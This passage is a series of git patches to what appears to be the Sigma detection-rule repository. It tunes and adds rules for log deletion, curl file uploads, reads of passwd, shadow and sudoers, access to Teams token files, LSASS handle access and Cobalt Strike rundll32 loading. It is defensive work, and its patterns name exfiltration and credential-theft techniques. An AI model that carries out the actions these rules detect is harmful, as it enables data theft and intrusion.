--git a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml index 7c10bd097..3962cf127 100644 --- a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml +++ b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml @@ -4,7 +4,7 @@ status: experimental description: Detects deletion of local audit logs author: remotephone, oscd.community date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: @@ -12,7 +12,10 @@ logsource: category: process_creation detection: selection1: - Image|endswith: '/rm' + Image|endswith: + - '/rm' + - '/unlink' + - '/shred' selection_cli_1: CommandLine|contains: '/var/log' selection_cli_2: From 5dfa871cefa52c8e74b5b9acca99d9e117ce05c9 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:38:00 +0200 Subject: [PATCH 035/120] Update proc_creation_lnx_base64_shebang_cli.yml --- .../process_creation/proc_creation_lnx_base64_shebang_cli.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml index 73ac17665..a58e96eb9 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml @@ -12,7 +12,7 @@ logsource: category: process_creation detection: selection: - - CommandLine|contains: + CommandLine|contains: - "IyEvYmluL2Jhc2" #!/bin/bash" - "IyEvYmluL2Rhc2" #!/bin/dash" - "IyEvYmluL3pza" #!/bin/zsh" From c2256845b2e67837b4f71d2cc47a4efc256fca34 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:45:56 +0200 Subject: [PATCH 036/120] refactor: renamed and changed title --- ...ation_disable_SEP.yml => proc_creation_win_taskkill_sep.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/process_creation/{proc_creation_disable_SEP.yml => proc_creation_win_taskkill_sep.yml} (95%) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml similarity index 95% rename from rules/windows/process_creation/proc_creation_disable_SEP.yml rename to rules/windows/process_creation/proc_creation_win_taskkill_sep.yml index abe183491..92f6ddbbe 100644 --- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml @@ -1,4 +1,4 @@ -title: Disabling Symantec Endpoint Protection with Taskkill +title: Taskkill Symantec Endpoint Protection id: 4a6713f6-3331-11ed-a261-0242ac120002 status: experimental description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. From 7f3158d09e24d7b3edd9332e5ef81d253de0c7c2 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 11:47:19 +0200 Subject: [PATCH 037/120] Fix after review --- .../linux/process_creation/proc_creation_lnx_cat_sudoers.yml | 1 + .../linux/process_creation/proc_creation_lnx_curl_usage.yml | 2 +- .../process_creation/proc_creation_lnx_local_account.yml | 1 + .../process_creation/proc_creation_lnx_local_groups.yml | 1 + .../proc_creation_lnx_susp_curl_fileupload.yml | 5 ++--- .../proc_creation_lnx_susp_history_recon.yml | 1 + .../proc_creation_win_susp_curl_fileupload.yml | 3 +-- 7 files changed, 8 insertions(+), 6 deletions(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index 5f7b9d5e7..2f7690be4 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml @@ -17,6 +17,7 @@ detection: - 'grep' - '/head' - '/tail' + - '/more' CommandLine|contains: ' /etc/sudoers' condition: selection falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml index 730ba33df..580eece01 100644 --- a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -11,7 +11,7 @@ logsource: product: linux detection: selection: - Image|endswith: '/curl.exe' + Image|endswith: '/curl' condition: selection falsepositives: - Scripts created by developers and admins diff --git a/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/rules/linux/process_creation/proc_creation_lnx_local_account.yml index 058e10b0e..fee4138fe 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -20,6 +20,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' CommandLine|contains: - '/etc/passwd' - '/etc/shadow' diff --git a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index ba0b9cad7..1bf72b8ea 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -18,6 +18,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' CommandLine|contains: '/etc/group' condition: 1 of selection* falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml index a38c1ef16..c47d62511 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml @@ -18,11 +18,10 @@ logsource: product: linux detection: selection: - Image|endswith: '/curl.exe' + Image|endswith: '/curl' CommandLine|contains: - ' -F ' - - ' --form ' - - ' --form-string ' + - ' --form' # Also covers the "--form-string" - ' -T ' - ' --upload-file ' - ' -d ' diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index ffddb3b60..128644fd6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml @@ -17,6 +17,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' selection_history: - CommandLine|contains: - '/.bash_history' diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml index 44c6f4373..f8ae829c9 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml @@ -20,8 +20,7 @@ detection: selection_cli: CommandLine|contains: - ' -F ' - - ' --form ' - - ' --form-string ' + - ' --form' # Also covers the "--form-string" - ' -T ' - ' --upload-file ' - ' -d ' From 9d5652c4c2d406440837fb6e0cd98cf76c4879ff Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 13:43:01 +0200 Subject: [PATCH 038/120] Update proc_creation_lnx_services_stop_and_disable.yml --- .../proc_creation_lnx_services_stop_and_disable.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml index 130d9b5c8..7b1778780 100644 --- a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml +++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml @@ -1,4 +1,4 @@ -title: Disable Or Stop Servicess +title: Disable Or Stop Services id: de25eeb8-3655-4643-ac3a-b662d3f26b6b status: experimental description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services From 914aa4ee3153185b400e72d0107ce2c5ffbd307c Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 14 Sep 2022 12:58:52 +0200 Subject: [PATCH 039/120] chore: add more checks --- tests/check-baseline-local.sh | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh index 4c3929b90..3c849f52d 100755 --- a/tests/check-baseline-local.sh +++ b/tests/check-baseline-local.sh @@ -12,6 +12,24 @@ if [[ -z $(command -v wget) ]]; then exit 1 fi +if [[ -z $(command -v xargs) ]]; then + >2& echo "xargs not found. Please install findutils." + >2& echo "Exiting" + exit 1 +fi + +if [[ -z $(command -v tar) ]]; then + >2& echo "tar not found. Please install." + >2& echo "Exiting" + exit 1 +fi + +if [[ -z $(command -v mktemp) ]]; then + >2& echo "mktemp not found. Please install coreutils." + >2& echo "Exiting" + exit 1 +fi + if [[ -z $(command -v realpath) ]]; then >2& echo "realpath not found. Please install coreutils." >2& echo "Exiting" From 68a80844ea911f6ddd0ba0f77fc964f6713bdda9 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Thu, 15 Sep 2022 13:14:37 +0200 Subject: [PATCH 040/120] fix: new FPs in testing environment --- .../image_load/image_load_susp_dbghelp_dbgcore_load.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml index c3d02ecdd..36d307d82 100755 --- a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml +++ b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml @@ -8,7 +8,7 @@ references: - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 date: 2019/10/27 -modified: 2022/08/09 +modified: 2022/09/15 logsource: category: image_load product: windows @@ -35,7 +35,7 @@ detection: - '\cscript.exe' - '\mshta.exe' # - '\regsvr32.exe' triggered by installing common software - - '\schtasks.exe' + # - '\schtasks.exe' triggered by installing software - '\dnx.exe' - '\regsvcs.exe' - '\sc.exe' From bde13350059aefd5833f151b0eda82924b6e2190 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:53:42 +0200 Subject: [PATCH 041/120] fix: FP with .NET ngen on test system --- .../registry_set/registry_set_taskcache_entry.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml index eaa29e421..c44153a11 100644 --- a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml +++ b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml @@ -3,7 +3,7 @@ id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious status: experimental date: 2021/06/18 -modified: 2022/08/24 +modified: 2022/09/16 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://labs.f-secure.com/blog/scheduled-task-tampering/ @@ -26,9 +26,11 @@ detection: filter_svchost: Image: 'C:\WINDOWS\system32\svchost.exe' filter_ngen: - Image|startswith: 'C:\Windows\Microsoft.NET\Framework\' + Image|startswith: 'C:\Windows\Microsoft.NET\Framework' # \Framework\ and \Framework64\ Image|endswith: '\ngen.exe' - TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + TargetObject|contains: + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN' filter_office_click_to_run: Image: - 'C:\Program Files\Microsoft Office\root\Integration\Integrator.exe' From bbc4aa329839f008cc63b1367b65203fa931824d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 16 Sep 2022 10:08:08 +0200 Subject: [PATCH 042/120] improve detection rate --- ..._creation_win_cobaltstrike_load_by_rundll32.yml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml index fa318be5f..59d50cbdb 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml @@ -3,7 +3,7 @@ status: test id: ae9c6a7c-9521-42a6-915e-5aaa8689d529 author: Wojciech Lesicki date: 2021/06/01 -modified: 2022/03/04 +modified: 2022/09/16 description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. references: - https://www.cobaltstrike.com/help-windows-executable @@ -16,14 +16,18 @@ logsource: category: process_creation product: windows detection: - selection: - CommandLine|contains|all: + selection_rundll: + - Image|endswith: '\rundll32.exe' + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: - 'rundll32.exe' - - '.dll' + - 'rundll32 ' + selection_params: + CommandLine|contains: '.dll' CommandLine|endswith: - ' StartW' - ',StartW' - condition: selection + condition: all of selection* falsepositives: - Unknown level: high From 4ede1b413fa2f50d5a9509454d47054b43b26544 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 21:46:45 +0430 Subject: [PATCH 043/120] Update reference --- .../powershell_module/posh_pm_alternate_powershell_hosts.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 3fc16fea8..85ad15559 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -6,7 +6,7 @@ date: 2019/08/11 modified: 2022/04/21 author: Roberto Rodriguez @Cyb3rWard0g references: - - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html + - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html tags: - attack.execution - attack.t1059.001 @@ -30,4 +30,4 @@ falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter - MSP Detection Searcher - Citrix ConfigSync.ps1 -level: medium \ No newline at end of file +level: medium From c78b332ba7bb0c7f50248f770edb4349081d696b Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 16 Sep 2022 19:37:26 +0200 Subject: [PATCH 044/120] Add posh_ps_sensitive_file_discovery --- .../posh_ps_sensitive_file_discovery.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml new file mode 100644 index 000000000..b4a5a05cd --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml @@ -0,0 +1,34 @@ +title: Powershell Sensitive File Discovery +id: 7d416556-6502-45b2-9bad-9d2f05f38997 +related: + - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 + type: derived +description: Detect adversaries enumerate sensitive files +references: + - https://twitter.com/malmoeb/status/1570814999370801158 +status: experimental +author: frack113 +date: 2022/09/16 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_action: + ScriptBlockText|contains: + - ls + - get-childitem + - gci + selection_recurse: + ScriptBlockText|contains: '-recurse' + selection_file: + ScriptBlockText|contains: + - 'pass' + - 'kdbx' + condition: all of selection_* +falsepositives: + - Unknown +level: medium +tags: + - attack.discovery + - attack.t1083 From 2cd376c70cae25e8213b4cfc702e2c7beedb6458 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:04:55 +0200 Subject: [PATCH 045/120] fix pass --- .../powershell_script/posh_ps_sensitive_file_discovery.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml index b4a5a05cd..5815a0ca6 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml @@ -23,8 +23,9 @@ detection: ScriptBlockText|contains: '-recurse' selection_file: ScriptBlockText|contains: - - 'pass' - - 'kdbx' + - '.pass' + - '.kdbx' + - '.kdb' condition: all of selection_* falsepositives: - Unknown From 8afb971e207a4dd85b06c0835a1cc8e9cf7089c6 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Sat, 17 Sep 2022 07:46:31 +0900 Subject: [PATCH 046/120] update application uninstalled rule --- .../builtin/application/win_builtin_remove_application.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 3209074b4..1a497e2b6 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -1,9 +1,10 @@ -title: An Application Is Uninstall +title: Application Uninstalled id: 570ae5ec-33dc-427c-b815-db86228ad43e status: experimental -description: An application have been remove check if it is a critical +description: An application has been removed. Check if it is critical. author: frack113 date: 2022/01/28 +modified: 2022/09/17 logsource: product: windows service: application @@ -16,7 +17,7 @@ detection: condition: selection falsepositives: - Unknown -level: low +level: informational tags: - attack.impact - attack.t1489 From 8b60317e2e42d23b579a612a7017e2fdda8ab1d0 Mon Sep 17 00:00:00 2001 From: tr0mb1r Date: Sat, 17 Sep 2022 10:47:35 +0400 Subject: [PATCH 047/120] Microsoft Teams Suspicious ObjectAccess events (#3500) --- .../win_teams_suspicious_objectaccess.yml | 27 +++++++++++++++++++ .../file_event_win_access_susp_teams.yml | 26 ++++++++++++++++++ ...ms_suspicious_command_line_cred_access.yml | 26 ++++++++++++++++++ 3 files changed, 79 insertions(+) create mode 100644 rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml create mode 100644 rules/windows/file_event/file_event_win_access_susp_teams.yml create mode 100644 rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml diff --git a/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml new file mode 100644 index 000000000..e19c134ff --- /dev/null +++ b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml @@ -0,0 +1,27 @@ +title: Suspicious Teams Application Related ObjectAcess Event +id: 25cde13e-8e20-4c29-b949-4e795b76f16f +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4663 + ObjectName|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + ProcessName|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 diff --git a/rules/windows/file_event/file_event_win_access_susp_teams.yml b/rules/windows/file_event/file_event_win_access_susp_teams.yml new file mode 100644 index 000000000..332a8a19c --- /dev/null +++ b/rules/windows/file_event/file_event_win_access_susp_teams.yml @@ -0,0 +1,26 @@ +title: Suspicious File Event With Teams Objects +id: 6902955a-01b7-432c-b32a-6f5f81d8f624 +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + category: file_event +detection: + selection: + TargetFilename|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + Image|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 diff --git a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml new file mode 100644 index 000000000..3c0eb326c --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml @@ -0,0 +1,26 @@ +title: Suspicious Command With Teams Objects Pathes +id: d2eb17db-1d39-41dc-b57f-301f6512fa75 +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + category: process_creation +detection: + selection: + CommandLine|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + Image|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 From 9f6604cf819a619dd615c2f4771d15aacf782d20 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 09:41:51 +0200 Subject: [PATCH 048/120] fix: aurora mtach calltrace msedeg.exe --- .../proc_access_win_direct_syscall_ntopenprocess.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index c449009b1..7faa0f832 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -6,7 +6,7 @@ references: status: experimental author: Christian Burkard, Tim Shelton date: 2021/07/28 -modified: 2022/08/09 +modified: 2022/09/18 logsource: category: process_access product: windows @@ -32,6 +32,8 @@ detection: falsepositive6: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' + falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider + CallTrace|endswith: ')' condition: selection and not 1 of falsepositive* falsepositives: - Unknown From 2da0554bedc5f3066064c1f61b318939edb33687 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 09:57:04 +0200 Subject: [PATCH 049/120] fix: temporarily disable Kernel-Audit-API-Calls --- .../proc_access_win_direct_syscall_ntopenprocess.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index 7faa0f832..e1587a4f6 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -33,7 +33,7 @@ detection: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider - CallTrace|endswith: ')' + Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* falsepositives: - Unknown From 2e8717d603ce7727240bbcec4d9f36285263052e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 10:39:56 +0200 Subject: [PATCH 050/120] fix: taskhostw FPs with lsass access --- rules/windows/builtin/security/win_susp_lsass_dump_generic.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index 824d0f1ec..b462d8e29 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -70,6 +70,9 @@ detection: ProcessName|startswith: 'C:\Program Files' # too many false positives with legitimate AV and EDR solutions filter3: ProcessName: 'C:\Windows\CCM\CcmExec.exe' + filter4: + ProcessName: 'C:\Windows\System32\taskhostw.exe' + AccessMask: '0x10' condition: 1 of selection_* and not 1 of filter* fields: - ComputerName From 34957a784b16dd1ab3be976c3bcd0ff344c9d966 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 10:42:19 +0200 Subject: [PATCH 051/120] fix: modified date update --- rules/windows/builtin/security/win_susp_lsass_dump_generic.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index b462d8e29..0942e28b4 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -4,7 +4,7 @@ description: Detects process handle on LSASS process with certain access mask status: experimental author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) date: 2019/11/01 -modified: 2022/04/29 +modified: 2022/09/18 references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment From 34d7ad03f7d7059a815ead1669694a62e2d38842 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 12:54:37 +0200 Subject: [PATCH 052/120] fix: FPs noticed with Aurora --- rules/windows/dns_query/dns_query_win_susp_ldap.yml | 4 +++- .../powershell_module/posh_pm_alternate_powershell_hosts.yml | 4 +++- .../proc_access_win_rare_proc_access_lsass.yml | 5 ++++- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index accfaf6e3..5f0998042 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -3,7 +3,7 @@ id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e description: Detect suspicious ldap request from non Windows application status: experimental date: 2022/08/20 -modified: 2022/09/08 +modified: 2022/09/18 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md @@ -20,6 +20,8 @@ detection: Image|endswith: '\MsMpEng.exe' filter_unknown: Image: '' + filter_azure: + Image|startswith: 'C:\WindowsAzure\GuestAgent' condition: dns_request and not 1 of filter_* falsepositives: - Programs that also lookup the observed domain diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 3fc16fea8..7b7d84390 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -3,7 +3,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2022/04/21 +modified: 2022/09/18 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -25,6 +25,8 @@ detection: ContextInfo|contains: 'C:\Windows\system32\dsac.exe' filter_winrm: ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding' + filter_help_update: + Payload|contains: 'Update-Help' condition: selection and not 1 of filter* falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml index 51c980f05..26a7bf029 100644 --- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml @@ -7,7 +7,7 @@ status: 